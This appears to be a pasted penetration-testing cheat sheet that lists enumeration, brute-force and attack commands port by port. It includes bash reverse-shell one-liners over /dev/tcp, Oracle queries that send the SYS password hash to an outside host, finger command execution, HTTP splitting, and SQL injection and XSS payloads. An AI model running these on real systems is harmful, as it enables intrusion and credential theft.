Guest User

Untitled

a guest
Dec 3rd, 2018
1,267
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.28 KB | None | 0 0
  1. • FTP port 21 open
  2. ○ Fingerprint server
  3. § telnet ip_address 21 (Banner grab)
  4. § Run command ftp ip_address
  5. § ftp@example.com
  6. § Check for anonymous access
  7. □ ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
  8. ○ Password guessing
  9. § Hydra brute force
  10. § medusa
  11. § Brutus
  12. ○ Examine configuration files
  13. § ftpusers
  14. § ftp.conf
  15. § proftpd.conf
  16. ○ MiTM
  17. § pasvagg.pl
  18. • SSH port 22 open
  19. ○ Fingerprint server
  20. § telnet ip_address 22 (banner grab)
  21. § scanssh
  22. □ scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
  23. ○ Password guessing
  24. § ssh root@ip_address
  25. § guess-who
  26. □ ./b -l username -h ip_address -p 22 -2 < password_file_location
  27. § Hydra brute force
  28. § brutessh
  29. § Ruby SSH Bruteforcer
  30. ○ Examine configuration files
  31. § ssh_config
  32. § sshd_config
  33. § authorized_keys
  34. § ssh_known_hosts
  35. § .shosts
  36. ○ SSH Client programs
  37. § tunnelier
  38. § winsshd
  39. § putty
  40. § winscp
  41. • Telnet port 23 open
  42. ○ Fingerprint server
  43. § telnet ip_address
  44. □ Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
  45. § telnetfp
  46. ○ Password Attack
  47. § Common passwords
  48. § Hydra brute force
  49. § Brutus
  50. § telnet -l "-froot" hostname (Solaris 10+)
  51. ○ Examine configuration files
  52. § /etc/inetd.conf
  53. § /etc/xinetd.d/telnet
  54. § /etc/xinetd.d/stelnet
  55. • Sendmail Port 25 open
  56. ○ Fingerprint server
  57. § telnet ip_address 25 (banner grab)
  58. ○ Mail Server Testing
  59. § Enumerate users
  60. □ VRFY username (verifies if username exists - enumeration of accounts)
  61. □ EXPN username (verifies if username is valid - enumeration of accounts)
  62. § Mail Spoof Test
  63. □ HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
  64. § Mail Relay Test
  65. □ HELO anything
  66. ® Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
  67. ® Unknown domain - mail from: <user@unknown_domain>
  68. ® Domain not present - mail from: <user@localhost>
  69. ® Domain not supplied - mail from: <user>
  70. ® Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
  71. ® Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
  72. ® Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
  73. ® User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
  74. ® Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
  75. ® Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
  76. ○ Examine Configuration Files
  77. § sendmail.cf
  78. § submit.cf
  79. • DNS port 53 open
  80. ○ Fingerprint server/ service
  81. § host
  82. □ host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
  83. § nslookup
  84. □ nslookup [ -option ... ] [ host-to-find | - [ server ]]
  85. § dig
  86. □ dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
  87. § whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
  88. ○ DNS Enumeration
  89. § Bile Suite
  90. □ perl BiLE.pl [website] [project_name]
  91. □ perl BiLE-weigh.pl [website] [input file]
  92. □ perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
  93. □ perl vet-mx.pl [input file] [true domain file] [output file]
  94. □ perl exp-tld.pl [input file] [output file]
  95. □ perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
  96. □ perl qtrace.pl [ip_address_file] [output_file]
  97. □ perl jarf-rev [subnetblock] [nameserver]
  98. § txdns
  99. □ txdns -rt -t domain_name
  100. □ txdns -x 50 -bb domain_name
  101. □ txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
  102. ○ Examine Configuration Files
  103. § host.conf
  104. § resolv.conf
  105. § named.conf
  106. • TFTP port 69 open
  107. ○ TFTP Enumeration
  108. § tftp ip_address PUT local_file
  109. § tftp ip_address GET conf.txt (or other files)
  110. § Solarwinds TFTP server
  111. § tftp – i <IP> GET /etc/passwd (old Solaris)
  112. ○ TFTP Bruteforcing
  113. § TFTP bruteforcer
  114. § Cisco-Torch
  115. • Finger Port 79 open
  116. ○ User enumeration
  117. § finger 'a b c d e f g h' @example.com
  118. § finger admin@example.com
  119. § finger user@example.com
  120. § finger 0@example.com
  121. § finger .@example.com
  122. § finger **@example.com
  123. § finger test@example.com
  124. § finger @example.com
  125. ○ Command execution
  126. § finger "|/bin/id@example.com"
  127. § finger "|/bin/ls -a /@example.com"
  128. ○ Finger Bounce
  129. § finger user@host@victim
  130. § finger @internal@external
  131. • Web Ports 80, 8080 etc. open
  132. ○ Fingerprint server
  133. § Telnet ip_address port
  134. § Firefox plugins
  135. □ All
  136. ® firecat
  137. □ Specific
  138. ® add n edit cookies
  139. ® asnumber
  140. ® header spy
  141. ® live http headers
  142. ® shazou
  143. ® web developer
  144. ○ Crawl website
  145. § lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
  146. § httprint
  147. § Metagoofil
  148. □ metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
  149. ○ Web Directory enumeration
  150. § Nikto
  151. □ nikto [-h target] [options]
  152. § DirBuster
  153. § Wikto
  154. § Goolag Scanner
  155. ○ Vulnerability Assessment
  156. § Manual Tests
  157. □ Default Passwords
  158. □ Install Backdoors
  159. ® ASP
  160. ◊ http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
  161. ® Assorted
  162. ◊ http://michaeldaw.org/projects/web-backdoor-compilation/
  163. ◊ http://open-labs.org/hacker_webkit02.tar.gz
  164. ® Perl
  165. ◊ http://home.arcor.de/mschierlm/test/pmsh.pl
  166. ◊ http://pentestmonkey.net/tools/perl-reverse-shell/
  167. ◊ http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
  168. ® PHP
  169. ◊ http://php.spb.ru/remview/
  170. ◊ http://pentestmonkey.net/tools/php-reverse-shell/
  171. ◊ http://pentestmonkey.net/tools/php-findsock-shell/
  172. ® Python
  173. ◊ http://matahari.sourceforge.net/
  174. ® TCL
  175. ◊ http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
  176. ® Bash Connect Back Shell
  177. ◊ GnuCitizen
  178. } Atttack Box: nc -l -p Port -vvv
  179. } Victim: $ exec 5<>/dev/tcp/IP_Address/Port
  180. Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
  181. ◊ Neohapsis
  182. } Atttack Box: nc -l -p Port -vvv
  183. } Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
  184. Victim: $ exec 1>&0 # Next we copy stdin to stdout
  185. Victim: $ exec 2>&0 # And finally stdin to stderr
  186. Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
  187. □ Method Testing
  188. ® nc IP_Adress Port
  189. ◊ HEAD / HTTP/1.0
  190. ◊ OPTIONS / HTTP/1.0
  191. ◊ PROPFIND / HTTP/1.0
  192. ◊ TRACE / HTTP/1.1
  193. ◊ PUT http://Target_URL/FILE_NAME
  194. ◊ POST http://Target_URL/FILE_NAME HTTP/1.x
  195. □ Upload Files
  196. ® curl
  197. ◊ curl -u <username:password> -T file_to_upload <Target_URL>
  198. ◊ curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
  199. ® put.pl
  200. ◊ put.pl -h target -r /remote_file_name -f local_file_name
  201. ® webdav
  202. ◊ cadaver
  203. □ View Page Source
  204. ® Hidden Values
  205. ® Developer Remarks
  206. ® Extraneous Code
  207. ® Passwords!
  208. □ Input Validation Checks
  209. ® NULL or null
  210. ◊ Possible error messages returned.
  211. ® ' , " , ; , <!
  212. ◊ Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
  213. ® – , = , + , "
  214. ◊ Used to craft SQL Injection queries.
  215. ® ‘ , &, ! , ¦ , < , >
  216. ◊ Used to find command execution vulnerabilities.
  217. ® "><script>alert(1)</script>
  218. ◊ Basic Cross-Site Scripting Checks.
  219. ® %0d%0a
  220. ◊ Carriage Return (%0d) Line Feed (%0a)
  221. } HTTP Splitting
  222. – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
  223. w i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
  224. } Cache Poisoning
  225. – language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
  226. ® %7f , %ff
  227. ◊ byte-length overflows; maximum 7- and 8-bit values.
  228. ® -1, other
  229. ◊ Integer and underflow vulnerabilities.
  230. ® %n , %x , %s
  231. ◊ Testing for format string vulnerabilities.
  232. ® ../
  233. ◊ Directory Traversal Vulnerabilities.
  234. ® % , _, *
  235. ◊ Wildcard characters can sometimes present DoS issues or information disclosure.
  236. ® Ax1024+
  237. ◊ Overflow vulnerabilities.
  238. □ Automated table and column iteration
  239. ® orderby.py
  240. ◊ ./orderby.py www.site.com/index.php?id=
  241. ® d3sqlfuzz.py
  242. ◊ ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
  243. § Vulnerability Scanners
  244. □ Acunetix
  245. □ Grendelscan
  246. □ NStealth
  247. □ Obiwan III
  248. □ w3af
  249. § Specific Applications/ Server Tools
  250. □ Domino
  251. ® dominoaudit
  252. ◊ dominoaudit.pl [options] -h <IP>
  253. □ Joomla
  254. ® cms_few
  255. ◊ ./cms.py <site-name>
  256. ® joomsq
  257. ◊ ./joomsq.py <IP>
  258. ® joomlascan
  259. ◊ ./joomlascan.py <site> <options>  [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
  260. ® joomscan
  261. ◊ ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
  262. ® jscan
  263. ◊ jscan.pl -f hostname
  264. ◊ (shell.txt required)
  265. □ aspaudit.pl
  266. ® asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
  267. □ Vbulletin
  268. ® vbscan.py
  269. ◊ vbscan.py <host> <port> -v
  270. ◊ vbscan.py -update
  271. □ ZyXel
  272. ® zyxel-bf.sh
  273. ® snmpwalk
  274. ◊ snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
  275. ® snmpget
  276. ◊ snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
  277. ○ Proxy Testing
  278. § Burpsuite
  279. § Crowbar
  280. § Interceptor
  281. § Paros
  282. § Requester Raw
  283. § Suru
  284. § WebScarab
  285. ○ Examine configuration files
  286. § Generic
  287. □ Examine httpd.conf/ windows config files
  288. § JBoss
  289. □ JMX Console http://<IP>:8080/jmxconcole/
  290. ® War File
  291. § Joomla
  292. □ configuration.php
  293. □ diagnostics.php
  294. □ joomla.inc.php
  295. □ config.inc.php
  296. § Mambo
  297. □ configuration.php
  298. □ config.inc.php
  299. § Wordpress
  300. □ setup-config.php
  301. □ wp-config.php
  302. § ZyXel
  303. □ /WAN.html (contains PPPoE ISP password)
  304. □ /WLAN_General.html and /WLAN.html (contains WEP key)
  305. □ /rpDyDNS.html (contains DDNS credentials)
  306. □ /Firewall_DefPolicy.html (Firewall)
  307. □ /CF_Keyword.html (Content Filter)
  308. □ /RemMagWWW.html (Remote MGMT)
  309. □ /rpSysAdmin.html (System)
  310. □ /LAN_IP.html (LAN)
  311. □ /NAT_General.html (NAT)
  312. □ /ViewLog.html (Logs)
  313. □ /rpFWUpload.html (Tools)
  314. □ /DiagGeneral.html (Diagnostic)
  315. □ /RemMagSNMP.html (SNMP Passwords)
  316. □ /LAN_ClientList.html (Current DHCP Leases)
  317. □ Config Backups
  318. ® /RestoreCfg.html
  319. ® /BackupCfg.html
  320. ® Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
  321. ◊ ZyXEL Config Reader
  322. ○ Examine web server logs
  323. § c:\winnt\system32\Logfiles\W3SVC1
  324. □ awk -F " " '{print $3,$11} filename | sort | uniq
  325. ○ References
  326. § White Papers
  327. □ Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
  328. □ Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
  329. □ Blind Security Testing - An Evolutionary Approach
  330. □ Command Injection in XML Signatures and Encryption
  331. □ Input Validation Cheat Sheet
  332. □ SQL Injection Cheat Sheet
  333. § Books
  334. □ Hacking Exposed Web 2.0
  335. □ Hacking Exposed Web Applications
  336. □ The Web Application Hacker's Handbook
  337. ○ Exploit Frameworks
  338. § Brute-force Tools
  339. □ Acunetix
  340. § Metasploit
  341. § w3af
  342. • Portmapper port 111 open
  343. ○ rpcdump.py
  344. § rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
  345. ○ rpcinfo
  346. § rpcinfo [options] IP_Address
  347. • NTP Port 123 open
  348. ○ NTP Enumeration
  349. § ntpdc -c monlist IP_ADDRESS
  350. § ntpdc -c sysinfo IP_ADDRESS
  351. § ntpq
  352. □ host
  353. □ hostname
  354. □ ntpversion
  355. □ readlist
  356. □ version
  357. ○ Examine configuration files
  358. § ntp.conf
  359. • NetBIOS Ports 135-139,445 open
  360. ○ nmap 192.168.0.101 --script=msrpc-enum
  361. ○ msf > use exploit/windows/dcerpc/ms03_026_dcom
  362. ○ smbclient -L 192.168.1.102
  363. smbclient //192.168.1.106/tmp
  364. smbclient \\\\192.168.1.105\\ipc$ -U john
  365. smbclient //192.168.1.105/ipc$ -U john
  366. ○ NetBIOS enumeration
  367. § Enum
  368. □ enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
  369. § Null Session
  370. □ net use \\192.168.1.1\ipc$ "" /u:""
  371. ® net view \\ip_address
  372. ® Dumpsec
  373. § Smbclient
  374. □ smbclient -L //server/share password options
  375. § Superscan
  376. □ Enumeration tab.
  377. § user2sid/sid2user
  378. § Winfo
  379. ○ NetBIOS brute force
  380. § Hydra
  381. § Brutus
  382. § Cain & Abel
  383. § getacct
  384. § NAT (NetBIOS Auditing Tool)
  385. ○ Examine Configuration Files
  386. § Smb.conf
  387. § lmhosts
  388. • SNMP port 161 open
  389. ○ Default Community Strings
  390. § public
  391. § private
  392. § cisco
  393. □ cable-docsis
  394. □ ILMI
  395. ○ MIB enumeration
  396. § Windows NT
  397. □ .1.3.6.1.2.1.1.5 Hostnames
  398. □ .1.3.6.1.4.1.77.1.4.2 Domain Name
  399. □ .1.3.6.1.4.1.77.1.2.25 Usernames
  400. □ .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
  401. □ .1.3.6.1.4.1.77.1.2.27 Share Information
  402. § Solarwinds MIB walk
  403. § Getif
  404. § snmpwalk
  405. □ snmpwalk -v <Version> -c <Community string> <IP>
  406. § Snscan
  407. § Applications
  408. □ ZyXel
  409. ® snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
  410. ® snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
  411. ○ SNMP Bruteforce
  412. § onesixtyone
  413. □ onesixytone -c SNMP.wordlist <IP>
  414. § cat
  415. □ ./cat -h <IP> -w SNMP.wordlist
  416. § Solarwinds SNMP Brute Force
  417. § ADMsnmp
  418. ○ Examine SNMP Configuration files
  419. § snmp.conf
  420. § snmpd.conf
  421. § snmp-config.xml
  422. • LDAP Port 389 Open
  423. ○ ldap enumeration
  424. § ldapminer
  425. □ ldapminer -h ip_address -p port (not required if default) -d
  426. § luma
  427. □ Gui based tool
  428. § ldp
  429. □ Gui based tool
  430. § openldap
  431. □ ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
  432. □ ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  433. □ ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
  434. □ ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
  435. □ ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
  436. ○ ldap brute force
  437. § bf_ldap
  438. □ bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
  439. § K0ldS
  440. § LDAP_Brute.pl
  441. ○ Examine Configuration Files
  442. § General
  443. □ containers.ldif
  444. □ ldap.cfg
  445. □ ldap.conf
  446. □ ldap.xml
  447. □ ldap-config.xml
  448. □ ldap-realm.xml
  449. □ slapd.conf
  450. § IBM SecureWay V3 server
  451. □ V3.sas.oc
  452. § Microsoft Active Directory server
  453. □ msadClassesAttrs.ldif
  454. § Netscape Directory Server 4
  455. □ nsslapd.sas_at.conf
  456. □ nsslapd.sas_oc.conf
  457. § OpenLDAP directory server
  458. □ slapd.sas_at.conf
  459. □ slapd.sas_oc.conf
  460. § Sun ONE Directory Server 5.1
  461. □ 75sas.ldif
  462. • PPTP/L2TP/VPN port 500/1723 open
  463. ○ Enumeration
  464. § ike-scan
  465. § ike-probe
  466. ○ Brute-Force
  467. § ike-crack
  468. ○ Reference Material
  469. § PSK cracking paper
  470. § SecurityFocus Infocus
  471. § Scanning a VPN Implementation
  472. • Modbus port 502 open
  473. ○ modscan
  474. • rlogin port 513 open
  475. ○ Rlogin Enumeration
  476. § Find the files
  477. □ find / -name .rhosts
  478. □ locate .rhosts
  479. § Examine Files
  480. □ cat .rhosts
  481. § Manual Login
  482. □ rlogin hostname -l username
  483. □ rlogin <IP>
  484. § Subvert the files
  485. □ echo ++ > .rhosts
  486. ○ Rlogin Brute force
  487. § Hydra
  488. • rsh port 514 open
  489. ○ Rsh Enumeration
  490. § rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
  491. ○ Rsh Brute Force
  492. § rsh-grind
  493. § Hydra
  494. § medusa
  495. • SQL Server Port 1433 1434 open
  496. ○ SQL Enumeration
  497. § piggy
  498. § SQLPing
  499. □ sqlping ip_address/hostname
  500. § SQLPing2
  501. § SQLPing3
  502. § SQLpoke
  503. § SQL Recon
  504. § SQLver
  505. ○ SQL Brute Force
  506. § SQLPAT
  507. □ sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
  508. □ sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
  509. § SQL Dict
  510. § SQLAT
  511. § Hydra
  512. § SQLlhf
  513. § ForceSQL
  514. • Citrix port 1494 open
  515. ○ Citrix Enumeration
  516. § Default Domain
  517. § Published Applications
  518. □ ./citrix-pa-scan {IP_address/file | - | random} [timeout]
  519. □ citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
  520. ○ Citrix Brute Force
  521. § bforce.js
  522. § connect.js
  523. § Citrix Brute-forcer
  524. § Reference Material
  525. □ Hacking Citrix - the legitimate backdoor
  526. □ Hacking Citrix - the forceful way
  527. • Oracle Port 1521 Open
  528. ○ Oracle Enumeration
  529. § oracsec
  530. § Repscan
  531. § Sidguess
  532. § Scuba
  533. § DNS/HTTP Enumeration
  534. □ SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
  535. □ SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
  536. § WinSID
  537. § Oracle default password list
  538. § TNSVer
  539. □ tnsver host [port]
  540. § TCP Scan
  541. § Oracle TNSLSNR
  542. □ Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
  543. § TNSCmd
  544. □ perl tnscmd.pl -h ip_address
  545. □ perl tnscmd.pl version -h ip_address
  546. □ perl tnscmd.pl status -h ip_address
  547. □ perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
  548. § LSNrCheck
  549. § Oracle Security Check (needs credentials)
  550. § OAT
  551. □ sh opwg.sh -s ip_address
  552. □ opwg.bat -s ip_address
  553. □ sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
  554. § OScanner
  555. □ sh oscanner.sh -s ip_address
  556. □ oscanner.exe -s ip_address
  557. □ sh reportviewer.sh oscanner_saved_file.xml
  558. □ reportviewer.exe oscanner_saved_file.xml
  559. § NGS Squirrel for Oracle
  560. § Service Register
  561. □ Service-register.exe ip_address
  562. § PLSQL Scanner 2008
  563. ○ Oracle Brute Force
  564. § OAK
  565. □ ora-getsid hostname port sid_dictionary_list
  566. □ ora-auth-alter-session host port sid username password sql
  567. □ ora-brutesid host port start
  568. □ ora-pwdbrute host port sid username password-file
  569. □ ora-userenum host port sid userlistfile
  570. □ ora-ver -e (-f -l -a) host port
  571. § breakable (Targets Application Server Port)
  572. □ breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
  573. § SQLInjector (Targets Application Server Port)
  574. □ sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
  575. □ sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
  576. § Check Password
  577. § orabf
  578. □ orabf [hash]:[username] [options]
  579. § thc-orakel
  580. □ Cracker
  581. □ Client
  582. □ Crypto
  583. § DBVisualisor
  584. □ Sql scripts from pentest.co.uk
  585. □ Manual sql input of previously reported vulnerabilties
  586. ○ Oracle Reference Material
  587. § Understanding SQL Injection
  588. § SQL Injection walkthrough
  589. § SQL Injection by example
  590. § Advanced SQL Injection in Oracle databases
  591. § Blind SQL Injection
  592. § SQL Cheatsheets
  593. □ http://ha.ckers.org/sqlinjection
  594. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
  595. http://www.0x000000.com/?i=14
  596. http://pentestmonkey.net/ 
  597. • NFS Port 2049 open
  598. ○ NFS Enumeration
  599. § showmount -e hostname/ip_address
  600. § mount -t nfs ip_address:/directory_found_exported /local_mount_point
  601. ○ NFS Brute Force
  602. § Interact with NFS share and try to add/delete
  603. § Exploit and Confuse Unix
  604. ○ Examine Configuration Files
  605. § /etc/exports
  606. § /etc/lib/nfs/xtab
  607. • Compaq/HP Insight Manager Port 2301,2381open
  608. ○ HP Enumeration
  609. § Authentication Method
  610. □ Host OS Authentication
  611. □ Default Authentication
  612. ® Default Passwords
  613. § Wikto
  614. § Nstealth
  615. ○ HP Bruteforce
  616. § Hydra
  617. § Acunetix
  618. ○ Examine Configuration Files
  619. § path.properties
  620. § mx.log
  621. § CLIClientConfig.cfg
  622. § database.props
  623. § pg_hba.conf
  624. § jboss-service.xml
  625. § .namazurc
  626. • MySQL port 3306 open
  627. ○ Enumeration
  628. § nmap -A -n -p3306 <IP Address>
  629. § nmap -A -n -PN --script:ALL -p3306 <IP Address>
  630. § telnet IP_Address 3306
  631. § use test; select * from test;
  632. § To check for other DB's -- show databases
  633. ○ Administration
  634. § MySQL Network Scanner
  635. § MySQL GUI Tools
  636. § mysqlshow
  637. § mysqlbinlog
  638. ○ Manual Checks
  639. § Default usernames and passwords
  640. □ username: root password:
  641. □ testing
  642. ® mysql -h <Hostname> -u root
  643. ® mysql -h <Hostname> -u root
  644. ® mysql -h <Hostname> -u root@localhost
  645. ® mysql -h <Hostname>
  646. ® mysql -h <Hostname> -u ""@localhost
  647. § Configuration Files
  648. □ Operating System
  649. ® windows
  650. ◊ config.ini
  651. ◊ my.ini
  652. } windows\my.ini
  653. } winnt\my.ini
  654. ◊ <InstDir>/mysql/data/
  655. ® unix
  656. ◊ my.cnf
  657. } /etc/my.cnf
  658. } /etc/mysql/my.cnf
  659. } /var/lib/mysql/my.cnf
  660. } ~/.my.cnf
  661. } /etc/my.cnf
  662. □ Command History
  663. ® ~/.mysql.history
  664. □ Log Files
  665. ® connections.log
  666. ® update.log
  667. ® common.log
  668. □ To run many sql commands at once -- mysql -u username -p < manycommands.sql
  669. □ MySQL data directory (Location specified in my.cnf)
  670. ® Parent dir = data directory
  671. ® mysql
  672. ® test
  673. ® information_schema (Key information in MySQL)
  674. ◊ Complete table list -- select table_schema,table_name from tables;
  675. ◊ Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
  676. ◊ File privileges -- select user,file_priv from mysql.user where user='root';
  677. ◊ Version -- select version();
  678. ◊ Load a specific file -- SELECT LOAD_FILE('FILENAME');
  679. □ SSL Check
  680. ® mysql> show variables like 'have_openssl';
  681. ◊ If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
  682. § Privilege Escalation
  683. □ Current Level of access
  684. ® mysql>select user();
  685. ® mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
  686. □ Access passwords
  687. ® mysql> use mysql
  688. ® mysql> select user,password from user;
  689. □ Create a new user and grant him privileges
  690. ® mysql>create user test identified by 'test';
  691. ® mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
  692. □ Break into a shell
  693. ® mysql> \! cat /etc/passwd
  694. ® mysql> \! bash
  695. ○ SQL injection
  696. § mysql-miner.pl
  697. □ mysql-miner.pl http://target/ expected_string database
  698. § http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
  699. § http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
  700. ○ References.
  701. § Design Weaknesses
  702. □ MySQL running as root
  703. □ Exposed publicly on Internet
  704. § http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
  705. § http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
  706. • RDesktop port 3389 open
  707. ○ Rdesktop Enumeration
  708. § Remote Desktop Connection
  709. ○ Rdestop Bruteforce
  710. § TSGrinder
  711. □ tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
  712. § Tscrack
  713. • Sybase Port 5000+ open
  714. ○ Sybase Enumeration
  715. § sybase-version ip_address from NGS
  716. ○ Sybase Vulnerability Assessment
  717. § Use DBVisualiser
  718. □ Sybase Security checksheet
  719. ® Copy output into excel spreadsheet
